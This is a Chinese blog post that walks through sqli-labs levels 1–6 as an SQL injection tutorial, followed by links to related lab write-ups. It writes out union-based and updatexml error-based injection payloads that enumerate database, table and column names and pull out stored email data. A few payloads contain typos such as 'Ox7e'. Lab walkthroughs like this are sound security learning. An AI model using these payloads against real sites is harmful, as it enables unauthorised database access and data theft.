以sqlilabs靶场为例,讲解SQL注入攻击原理【1-6关】

已于 2024-06-02 21:23:00 修改
阅读量662 收藏 15
点赞数 26
分类专栏: sqlilabs靶场学习 文章标签: sql 数据库 web安全 网络安全 网络
于 2024-05-15 21:19:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42515203/article/details/138856494
版权

一.显错注入

判断url闭合的类型是什么,确定之后,解题步骤为:

1.获取字段数量:order by 数字。

2.获取数据库名:union select database()。

3.获取数据表名:union select table_name from information_schema.tables where table_schema=database();  # 可以使用group_concat()获取多个字段。

4.获取字段名: union select column_name from information_schema.columns where table_schema=database() and table_name=上一步数据表名;

5.根据字段名获取目标内容。

【less-1:字符注入 】

例如:IP地址/sqli-labs-master/Less-1/?id=1

在后面加 '  and 1=2  union select .....   -- ++

【less-2:数字注入 】

例如:IP地址/sqli-labs-master/Less-2/?id=1

后面不加 '  and 1=2  union select .....  

【less-3:') 】

例如:IP地址/sqli-labs-master/Less-3/?id=1

后面 加 ')  and 1=2  union select .....  -- ++

【less-4:") 】

例如:IP地址/sqli-labs-master/Less-4/?id=1

后面 加 ")  and 1=2  union select .....  -- ++

二、SQL盲注

此种注入不会有对应的结果返回。

解题思路:

1.判断是否存在注入:?id=1' and 1=1 -- ++

2.判断库名:?id=1 'and updatexml(1,concat(Ox7e,(SELECT database()),0x7e),1)-- ++

3.判断表名:?id=1 'and updatexml(1,concat(Ox7e,(select table_name from information_schema.tables where table_schema='上一步获取的数据库名' limit 0,1),Ox7e),1) -- ++

4.判断字段名:?id=1 'and updatexml(1,concat(Ox7e,(select column_name from information_schema.columns where table_schema='数据库名' and table_name='表名' limit0,1),0x7e),1)-- ++

5.获取具体信息:?id=1' and updatexml(1,concat(0x7e,(select group_concat(id) from emails ),0x7e),1) -- ++

【less-5:?id' and updatexml(1,concat(0x7e, (SQL语句) ,  0x7e),1) 】

PS:updatexml(参数1,参数2,参数3):参数1是被替换字符,参数2是xpath位置,参数3 是替代字符。例如updatexml('你好帅',2,"真的")  运行结果为: 你真的帅。

这个函数有个特点,先会判断参数2是否合适,如果不合适,则会把参数2显示出来。

【less-6:?id" and updatexml(1,concat(0x7e, (SQL语句) ,  0x7e),1) 】

解题思路与less-5相同,唯一区别是 url?id" and updatexml();

数字兴
关注
  • 26
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入原理SQLI-LABS实验环境搭建
wr456wr的博客
03-22 857
SQL注入原理SQLI-LABS实验环境搭建 文章目录1. sqli-labs实验环境搭建2. 更新kali系统中的火狐浏览器3. 在火狐浏览器中安装hackbar插件4. 熟悉各种闭合方式并通过hackbar插件进行探测5. 熟悉使用hackbar插件,通过order by判断查询字段数熟悉limit的使用熟悉order by的使用 1. sqli-labs实验环境搭建 主机:centos7 ip:192.168.31.128 闭防火墙并设置开机不启动 systemctl stop firewall
mysql注入-sqlilabs靶场注入
10-15
SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些卡,你可以理解不同类型的SQL注入漏洞,并学习如何检测和利用它们。 ...
sql-labs_less1-6
soldi_er的博客
03-19 184
文章目录概述GET注入判断注入点和闭合方式(待梳理)联合查询(1-4)报错注入(5-6)outfile写木马(第7)布尔盲注(第8)时间盲注(9-10)小结POST注入参考 概述   以mysql作为数据库对象。 GET注入   常见功能点:查询框。 判断注入点和闭合方式(待梳理)   默认前提:id=1返回数据非空。以数字型注入为例。   判断依据:输入语句是否被程序执行 判断方式 用户输入 页面结果 原因 单引号报错 id=1’ 输出数据库报错信息 SQL语法错误
于在sqli-labs1~20中使用的注入方式原理
weixin_43733035的博客
01-21 448
一. 1. 排序:order by 基于sql语法的排序,根据by后面的数字来进行升序排序,或者通过使用desc来进行降序 排序。 2. 联合注入:union select 1,2,3 - - + 这里是基于sql语句,当通过order by已经测试出来有多少组数据之后,可以先使用union select 来查询有多少显示位,然后,通过将相应位的数字改为查询语句就可以在相应的显示位显示出...
安全测试-安装 sqli-labs 靶场Sql注入原理、手动、自动注入、检测及防御
NeilNiu
01-30 1205
安装 sqli-labs 靶场 sqli-labs 是一款用于学习 SQL 注入的靶场平台,覆盖了各种类型的 SQL 注入,题目共 75 道,按难度划分为 4 页。sqli-labs 靶场的项目开源地址为https://github.com/Audi-1/sqli-labs。我们通过docker来进行安装 搜索 sqli-labs 镜像 docker search sqli-labs 然后拉取镜像: docker pull acgpiano/sqli-labs 在容器中运行 sqli-labs: doc
零基础从sqli-labs开始学SQL注入【个人记录向】【1】
weixin_44758212的博客
10-13 1237
sql注入自学向
PHP、Apache环境中部署sqli-labs(SQL注入靶场
01-08
PHP、Apache 环境中部署 sqli-labs(SQL 注入靶场) 知识点 1: sqli-labs 介绍 sqli-labs 是一款开源的练习 SQL 注入的靶场工具,用 PHP 代码编写而成。它需要 PHP 和 Apache 环境运行。sqli-labs 提供了一个实践 ...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqlilabs,里边赠送包含了,sqlilabs过手册-注入天书,联系sql注入的绝佳靶场
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php,Tomcat+mysql+java(部分卡需要) Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改...
(手工)【sqli-labs20】cookie注入:原理、利用过程
07-10 932
SQL-cookie注入】
sqli-labs靶场分析
RestoreJustice的博客
03-18 2361
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
Web安全漏洞专项靶场SQL注入—docker环境sqli-labs靶场—详细通指南
qq_38678845的博客
01-22 1845
Web安全SQL注入漏洞的专项训练
sqli-labs
最新发布
lizhiwei21的博客
02-04 849
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
docker原理Sqli-labs的搭建和通(适合新手观看)
h0ld1rs的博客
07-12 1221
1.docker的解释和搭建 docker英语译为码头工人,它是一个与虚拟机有异曲同工之妙的软件。是软件开发与测试的好帮手。在虚拟机中,我们需要**自己寻找ISO文件搭建环境。而且搭建的系统可以是可视化的界面。**而在docker的集成化中,它相当于把ISO文件,公布出来,供你挑选。 Docker可以加快打包时间,加快测试,加快发布,缩短开发及运行代码之间的周期。Docker通过结合内核容器化特点和工作流,并使之工具化来实现这一切,帮助管理和发布你的应用。 ...
sqli-labs闯指南 1—10
热门推荐
18年3月萌新白帽子
06-18 5万+
如果你是使用的phpstudy,请务必将sql的版本调到5.5以上,因为这样你的数据库内才会有information_schema数据库,方便进行实验测试。另外-- (这里有一个空格,--空格)在SQL内表示注释,但在URL中,如果在最后加上-- ,浏览器在发送请求的时候会把URL末尾的空格舍去,所以我们用--+代替-- ,原因是+在URL被URL编码后会变成空格。第一1.经过语句and 1=2...
sqli-labs—————Sql注入之盲注讲解
Fly_鹏程万里
05-08 2153
盲注何为盲注?盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。盲注分为三类•基于布尔SQL盲注•基于时间的SQL盲注•基于报错的SQL盲注1、基于布尔SQL盲注————构造逻辑判断我们可以利用逻辑判断进行截取字符串相函数解析  http://blog.csdn.net/Fly_hps/article...
MYSQL注入天书之stacked injection
weixin_34221332的博客
08-11 635
第三部分/page-3 Stacked injection Background-8 stacked injection Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加 ; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值